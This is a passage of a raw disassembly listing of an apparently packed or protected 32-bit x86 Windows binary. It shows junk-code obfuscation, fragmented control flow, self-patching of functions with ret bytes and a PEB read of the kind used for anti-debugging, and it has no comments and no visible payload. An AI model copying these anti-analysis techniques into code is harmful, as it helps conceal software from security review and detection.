		push	ebx
		jmp	loc_442058
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456605:				; CODE XREF: sub_445226:loc_45AFF3j
		call	sub_442C3E
		mov	ds:off_41E100, eax
		lea	eax, sub_447F91
		mov	byte ptr [eax],	0C3h
		jmp	sub_447F91
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45661E:				; CODE XREF: y2kk37jd:0044E8EFj
		push	ebx
		push	0D4960849h
		jmp	loc_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456629:				; CODE XREF: sub_445226+C71Aj
		add	eax, edi
		pop	edi
		xor	edx, edx
		push	edx
		push	eax
		mov	eax, [ebp-1Ch]
		jmp	loc_445C98
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442A84

loc_456638:				; CODE XREF: sub_442A84+5AE4j
		jp	loc_44280D
		push	ebp
		jmp	loc_4546C2
; END OF FUNCTION CHUNK	FOR sub_442A84
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2FD

loc_456644:				; CODE XREF: sub_43B2FD+72B7j
		adc	edx, 53BBE04Ch
		cdq
		jmp	loc_455508
; END OF FUNCTION CHUNK	FOR sub_43B2FD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_456650:				; CODE XREF: sub_44001E-1BF8j
		jz	loc_44A9A4

loc_456656:				; CODE XREF: sub_45B7AA:loc_455DA3j
		lea	eax, [ebp-25Ch]

loc_45665C:				; CODE XREF: y2kk37jd:0043D9F6j
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44D915
		jmp	loc_44E783
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_45666D:				; CODE XREF: sub_4514DE:loc_456C56j
		adc	ecx, 5A0B99C8h
		test	ebp, 0D178B3B6h
		jmp	loc_447A46
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EC21

loc_45667E:				; CODE XREF: sub_44EC21:loc_44224Aj
		jz	loc_445B87

loc_456684:				; CODE XREF: sub_44D3D0+2516j
		jmp	loc_446469
; END OF FUNCTION CHUNK	FOR sub_44EC21
; ---------------------------------------------------------------------------
		test	esi, ecx
		jmp	loc_445B7E
; ---------------------------------------------------------------------------

loc_456690:				; CODE XREF: y2kk37jd:loc_4557C8j
		pop	eax
		xor	eax, 0CD8A2AEEh
		test	eax, 400h
		jmp	loc_45AA3B
; ---------------------------------------------------------------------------

loc_4566A2:				; CODE XREF: y2kk37jd:004557A5j
		add	edi, 740EBA95h

; =============== S U B	R O U T	I N E =======================================



sub_4566A8	proc near		; CODE XREF: y2kk37jd:0043DEEEp

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_45405E
sub_4566A8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_4566B4:				; CODE XREF: y2kk37jd:0045B5EDj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44472C

loc_4566B5:				; CODE XREF: sub_44472C+13F7Cj
		jmp	loc_4412FE
; END OF FUNCTION CHUNK	FOR sub_44472C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C01A

loc_4566BA:				; CODE XREF: sub_45C01A-1FEFj
		or	ebp, esi

loc_4566BC:				; CODE XREF: y2kk37jd:loc_440678j
					; sub_45C01A:loc_45A01Aj
		add	eax, 0BF3454ABh
		push	offset sub_45C2CA
		jmp	loc_43D455
; END OF FUNCTION CHUNK	FOR sub_45C01A
; ---------------------------------------------------------------------------

loc_4566CC:				; DATA XREF: sub_44DB32:loc_44EC17o
		push	edi
		mov	edi, ecx
		xchg	edi, [esp]
		mov	ecx, ebp
		xchg	ecx, [esp]
		mov	ebp, esp
; START	OF FUNCTION CHUNK FOR sub_454539

loc_4566D9:				; CODE XREF: sub_454539:loc_4446B8j
		push	edx
		jmp	loc_45A163
; END OF FUNCTION CHUNK	FOR sub_454539

; =============== S U B	R O U T	I N E =======================================



sub_4566DF	proc near		; DATA XREF: y2kk37jd:00446B8Bo
		push	eax
		push	eax
		mov	edx, eax
sub_4566DF	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_4566E3:				; CODE XREF: sub_4411C3:loc_449D44j
		call	sub_4581BB
		jmp	loc_446878
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------

loc_4566ED:				; CODE XREF: y2kk37jd:00457ED1j
		mov	edx, ds:dword_446E98
		or	edx, edx
		jmp	loc_4568C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4566FA:				; CODE XREF: sub_445226:loc_4591CCj
		lea	eax, [ebp-64h]
		push	ebx
		mov	ebx, eax
		xchg	ebx, [esp+8+var_8]
		push	400000h
		mov	eax, [ebp-10h]
		push	eax
		jmp	loc_457E2B
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45392D

loc_456711:				; CODE XREF: sub_45392D+9j
		or	[ecx+edx], al
		jmp	loc_458896
; END OF FUNCTION CHUNK	FOR sub_45392D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_267. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4578A6

loc_45671A:				; CODE XREF: sub_4578A6-C846j
		jmp	loc_450908
; END OF FUNCTION CHUNK	FOR sub_4578A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440A47

loc_45671F:				; CODE XREF: sub_440A47:loc_45AE2Aj
		sub	ebx, 79046349h
		or	ebx, 0B8E839C1h
		xor	ebx, 70447DC0h
		sub	ebx, 0B1F0903Fh
		jmp	loc_445C64
; END OF FUNCTION CHUNK	FOR sub_440A47
; ---------------------------------------------------------------------------

loc_45673C:				; CODE XREF: y2kk37jd:00454D46j
		jns	loc_44D60E

; =============== S U B	R O U T	I N E =======================================



sub_456742	proc near		; CODE XREF: sub_44894A+Ap

; FUNCTION CHUNK AT 00454DE9 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	ecx
		push	offset sub_44B677
		jmp	loc_454DE9
sub_456742	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_456751:				; CODE XREF: sub_4448E2:loc_43F6F3j
		jnz	loc_459200
		jmp	loc_44A765
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445787

loc_45675C:				; CODE XREF: sub_445787-A46Aj
		call	sub_45BEC4

loc_456761:				; CODE XREF: sub_44615F+12F72j
		jmp	loc_44A18E
; END OF FUNCTION CHUNK	FOR sub_445787
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_456766:				; CODE XREF: sub_4448E2-5911j
		jmp	loc_450334
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------

loc_45676B:				; CODE XREF: y2kk37jd:0045503Dj
		push	0
		push	10h
		mov	eax, [ebp-8]
		push	eax
; START	OF FUNCTION CHUNK FOR sub_451843

loc_456773:				; CODE XREF: sub_451843:loc_454987j
		call	sub_45C4C8
		push	0C91E9625h
		pop	eax
		jmp	loc_445DCF
; END OF FUNCTION CHUNK	FOR sub_451843
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_456783:				; CODE XREF: sub_44610D+D38Cj
		jo	loc_44ECD4
		jz	loc_45A1A5
		mov	eax, 1B67B0ABh
		add	esi, eax
		jmp	loc_44268C
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B84

loc_45679B:				; CODE XREF: sub_454B84-8117j
		push	209A9454h
		pop	ebx
		or	ebx, 4B41E7D1h
		xor	ebx, 19ADB5CCh
		and	ebx, 9FB43344h
		add	ebx, 0EE10C235h
		xchg	ebx, [esp+0]
		jmp	sub_459F8F
; END OF FUNCTION CHUNK	FOR sub_454B84

; =============== S U B	R O U T	I N E =======================================



sub_4567C1	proc near		; DATA XREF: sub_43C7BF:loc_45BB8Fo
		xor	eax, 19562E6Eh
		push	ecx
		push	0F9C91A21h
		pop	ecx
		sub	ecx, 6840AF81h
		js	loc_453E12
		adc	eax, esi
		sbb	edx, 77069537h
		jmp	loc_440ACD
sub_4567C1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4567E7:				; CODE XREF: sub_445226:loc_43F9E6j
		test	eax, 0D2B07E19h
		jmp	loc_452000
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
		cmp	edi, 0AC6A4A19h
		jmp	loc_44D5E7

; =============== S U B	R O U T	I N E =======================================



sub_4567FD	proc near		; CODE XREF: sub_45405Ep
					; y2kk37jd:loc_45A7A0j

; FUNCTION CHUNK AT 00448C26 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CE45 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F115 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 004508B6 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax

loc_456801:				; CODE XREF: sub_4578A6-15232j
		push	ebp
		mov	ebp, esp
		jmp	loc_448C26
sub_4567FD	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_456809	proc near		; DATA XREF: sub_44AD49-5220o

var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C0FD SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0043C319 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043D154 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043E855 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E96F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F2E7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004408AF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440BED SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440CC7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004416D5 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00443073 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00443864 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443D84 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044659E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447418 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004483F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448B22 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A723 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044AE23 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0044B16E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B17E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B9E9 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D444 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D4F4 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044FB31 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004505D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004527EA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452C9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453C6C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00454584 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004547F5 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00455FFB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004571B7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004593C1 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00459B0A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00459F27 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A0A0 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A6B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A988 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B96D SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045B9B5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0045C44B SIZE 00000005 BYTES

		push	eax
		push	0FFFFFFFFh
		lea	eax, [ebp-800h]
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		call	sub_446120
		jmp	loc_452C9E
sub_456809	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AA96

loc_456822:				; CODE XREF: sub_44AA96+6j
		mov	eax, [eax]
		push	offset loc_44049E
		jmp	nullsub_185
; END OF FUNCTION CHUNK	FOR sub_44AA96
; ---------------------------------------------------------------------------
		jmp	ds:off_41E1EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346B

loc_456834:				; CODE XREF: sub_44346B-4AA5j
		jmp	loc_43CE47
; END OF FUNCTION CHUNK	FOR sub_44346B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD3D

loc_456839:				; CODE XREF: y2kk37jd:0043B46Fj
					; sub_455C79:loc_444F39j ...
		jb	loc_43B474
		pop	edx
		mov	eax, [esp-4+arg_0]
		push	edx
		push	edx
		push	101F1839h
		jmp	loc_453386
; END OF FUNCTION CHUNK	FOR sub_43BD3D
; ---------------------------------------------------------------------------

loc_45684F:				; CODE XREF: y2kk37jd:00443A4Aj
		xchg	ecx, [edi]
		jmp	loc_44397B
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_349. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_456857:				; CODE XREF: sub_4458DD+26C6j
		jmp	loc_44DB06
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443278

loc_45685C:				; CODE XREF: sub_443278+4j
		jmp	loc_455E70
; END OF FUNCTION CHUNK	FOR sub_443278
; ---------------------------------------------------------------------------

loc_456861:				; CODE XREF: y2kk37jd:0043FA1Ej
		jmp	nullsub_497
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456866:				; CODE XREF: sub_445226:loc_45BD42j
		sub	eax, 5FBA0DACh
		or	eax, ds:4000E8h
		xor	eax, 0FCE42BA4h
		add	eax, ebp
		add	eax, 0F058245Dh

loc_456880:				; CODE XREF: y2kk37jd:loc_4434C7j
		push	offset sub_450AB0
		jmp	nullsub_505
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_45688A:				; CODE XREF: y2kk37jd:00453327j
		jle	loc_444486

; =============== S U B	R O U T	I N E =======================================



sub_456890	proc near		; CODE XREF: sub_4401D6+13p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044F5DB SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004555E5 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0045B35F SIZE 00000017 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		xchg	ebx, [esp-4+arg_0]
		push	0
		push	edx
		jmp	loc_45B35F
sub_456890	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_45689F	proc near		; DATA XREF: sub_44B489-A2F9o

; FUNCTION CHUNK AT 0043B95C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BB28 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043C2A1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043D3B7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D983 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DB40 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043DB94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E530 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E5AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EC96 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0043F4F3 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0043F8C6 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004417D4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00441818 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442319 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004429A6 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00442E56 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00443438 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00443755 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004437C1 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00443A57 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444F5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044566B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044571A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445F0F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446EDA SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00446EF5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00449184 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449DEC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A660 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044AFC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F04A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F408 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00450404 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450869 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450C7E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450D6B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450FCB SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045128B SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00451657 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451E2E SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045282E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00454098 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004554D8 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004556A4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00455ED8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456261 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A90 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457582 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00457B55 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00457B7A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00457BF9 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00458BAE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459AE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A096 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A8D2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045AE49 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045B1A1 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045BACA SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045BCA2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045C277 SIZE 0000001A BYTES

		add	edx, 4AE0ACCFh
		call	sub_446DFB

loc_4568AA:				; CODE XREF: sub_450FE4+9j
		jmp	loc_45282E
sub_45689F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_4568AF:				; CODE XREF: sub_45B7AA-1B273j
		jmp	loc_450C11
; END OF FUNCTION CHUNK	FOR sub_45B7AA

; =============== S U B	R O U T	I N E =======================================



sub_4568B4	proc near		; CODE XREF: y2kk37jd:0043C3ECj
					; sub_44FA88:loc_44A1F6p
		xchg	edi, [esp+0]
		pop	edi
		push	edx
		call	sub_4599BE
		call	sub_44D5A6

loc_4568C3:				; CODE XREF: y2kk37jd:004566F5j
		jnz	loc_44D763
		jmp	loc_4452D5
sub_4568B4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FC0

loc_4568CE:				; CODE XREF: sub_458FC0-18331j
		adc	esi, 0F0DA7CA7h
		xchg	ebp, [eax]

loc_4568D6:				; CODE XREF: sub_458FC0:loc_456F4Fj
		push	eax
		push	0FDA31354h
		pop	eax
		rol	eax, 13h
		and	eax, 0D6760045h
		jmp	loc_4523E0
; END OF FUNCTION CHUNK	FOR sub_458FC0
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0BC, eax
		push	offset sub_452545
		jmp	loc_451D2E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4421DC

loc_4568FB:				; CODE XREF: sub_4421DC:loc_457EB6j
		add	eax, ecx
		pop	ecx
		call	sub_441856
		push	offset loc_440B99
		jmp	nullsub_263
; END OF FUNCTION CHUNK	FOR sub_4421DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF38

loc_45690D:				; CODE XREF: sub_44CF38:loc_45A2D3j
		and	eax, 0C5570A3Eh
		rol	eax, 5
		jnb	loc_45792C
; END OF FUNCTION CHUNK	FOR sub_44CF38
; START	OF FUNCTION CHUNK FOR sub_4576F6

loc_45691C:				; CODE XREF: sub_4576F6+10j
		jmp	nullsub_215
; END OF FUNCTION CHUNK	FOR sub_4576F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459158

loc_456921:				; CODE XREF: sub_459158-1A5E4j
		jmp	loc_440190
; END OF FUNCTION CHUNK	FOR sub_459158
; ---------------------------------------------------------------------------
		jb	loc_44E878
		jmp	loc_457926
; ---------------------------------------------------------------------------
		mov	ebx, [edx]
		jmp	sub_442E78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E25A

loc_456938:				; CODE XREF: sub_43E25A+C8ACj
		jz	loc_45C363
		jmp	loc_45289D
; END OF FUNCTION CHUNK	FOR sub_43E25A
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_183. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_456944:				; CODE XREF: sub_43F346+1A0EFj
		jmp	loc_44C3B8
; END OF FUNCTION CHUNK	FOR sub_43F346

; =============== S U B	R O U T	I N E =======================================



sub_456949	proc near		; DATA XREF: y2kk37jd:00458363o
		xchg	edi, [esp+0]
		push	0

loc_45694E:				; CODE XREF: y2kk37jd:loc_4447E5j
		call	sub_456CD8
sub_456949	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_454413

loc_456953:				; CODE XREF: sub_454413+51FEj
		jmp	loc_4430BA
; END OF FUNCTION CHUNK	FOR sub_454413
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D715

loc_456958:				; CODE XREF: sub_44D715+9j
		jmp	loc_440846
; END OF FUNCTION CHUNK	FOR sub_44D715
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CA

loc_45695D:				; CODE XREF: sub_4424CA+8D2Dj
		jmp	nullsub_447
; END OF FUNCTION CHUNK	FOR sub_4424CA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_456962:				; CODE XREF: sub_445226-8D04j
		jmp	loc_4411FC
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4438B1

loc_456967:				; CODE XREF: sub_4438B1:loc_453D34j
		jz	loc_43B747
		jmp	loc_447947
; END OF FUNCTION CHUNK	FOR sub_4438B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4507BF

loc_456972:				; CODE XREF: sub_4507BF+F75j
					; DATA XREF: sub_443BAF+15F25o
		sub	eax, ecx
		xchg	esi, [esp-4+arg_0]
		mov	ecx, esi
		pop	esi
		ror	eax, 0Ch
		jmp	loc_43E937
; ---------------------------------------------------------------------------

loc_456982:				; CODE XREF: sub_4507BF-D89Aj
		or	eax, ecx
		add	ebx, 33597428h
		cdq
		jmp	loc_445A9C
; END OF FUNCTION CHUNK	FOR sub_4507BF

; =============== S U B	R O U T	I N E =======================================



sub_456990	proc near		; CODE XREF: sub_454433:loc_43CDE6j

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 004427DB SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004432C2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044397B SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00443A2A SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0044E6A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E70F SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00458B00 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045B888 SIZE 0000000B BYTES

		push	ebx
		push	0FAA61EBh
		xchg	edi, [esp+8+var_8]
		mov	ebx, edi
		pop	edi
		add	ebx, 5486791Ch
		jmp	loc_44E6A3
sub_456990	endp

; ---------------------------------------------------------------------------

loc_4569A7:				; CODE XREF: y2kk37jd:00450AECj
		ror	ebp, 5

loc_4569AA:				; CODE XREF: y2kk37jd:0044C418j
		add	edi, 69447C1Eh
		xchg	edi, [esp]
		jmp	loc_457CF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4569B8:				; CODE XREF: sub_445226:loc_457021j
		ror	eax, 15h
		jz	loc_4571C9
		push	offset sub_448C53
		jmp	loc_43F4E2
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_4569CB:				; CODE XREF: y2kk37jd:loc_44834Bj
		popf
		jmp	loc_45560E

; =============== S U B	R O U T	I N E =======================================



sub_4569D1	proc near		; CODE XREF: y2kk37jd:0043E9FBj
					; sub_43EBAB+3p
		xchg	esi, [esp+0]
		pop	esi
		mov	eax, 52h
		call	sub_454413
		jmp	loc_43C144
sub_4569D1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	loc_45A710
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_4569E9:				; CODE XREF: sub_44AC89:loc_459829j
		mov	eax, large fs:30h
		jmp	loc_453066
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------

loc_4569F5:				; CODE XREF: y2kk37jd:0044AA1Fj
		adc	esi, 78116B2h

; =============== S U B	R O U T	I N E =======================================



sub_4569FB	proc near		; CODE XREF: sub_44C56D-2ED2p
		xchg	edi, [esp+0]
		pop	edi
		call	sub_442C3E
		mov	ds:dword_41E15C, eax
		lea	eax, nullsub_456
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_456
sub_4569FB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		push	offset loc_44DFA8
		jmp	locret_446677
; ---------------------------------------------------------------------------

loc_456A22:				; CODE XREF: y2kk37jd:loc_43DEC1j
					; y2kk37jd:0043DED4j
		or	edx, 67A533Eh
; START	OF FUNCTION CHUNK FOR sub_442376

loc_456A28:				; CODE XREF: sub_442376+12B45j
		add	edx, 5948E095h
		xchg	edx, [esp-4+arg_0]
		jmp	sub_43F5BD
; END OF FUNCTION CHUNK	FOR sub_442376

; =============== S U B	R O U T	I N E =======================================



sub_456A36	proc near		; CODE XREF: y2kk37jd:loc_44622Ej
					; sub_447F67+10j ...

; FUNCTION CHUNK AT 00445634 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004467AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446BD4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004474D7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E768 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE77 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451A82 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456CAF SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00456EFD SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00458BF4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0045AA41 SIZE 00000005 BYTES

		xchg	esi, [esp+0]
		mov	edx, esi
		pop	esi
		jns	loc_451A82
		call	sub_44E648

loc_456A47:				; CODE XREF: sub_445CC9-268Dj
		mov	eax, [eax]
		test	eax, 70h
		jz	loc_458BF4
		jmp	loc_44E768
sub_456A36	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F641

loc_456A59:				; CODE XREF: y2kk37jd:00442706j
					; sub_44F641:loc_45A7BCj
		jz	loc_458C75
		jmp	loc_457012
; END OF FUNCTION CHUNK	FOR sub_44F641
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44626D

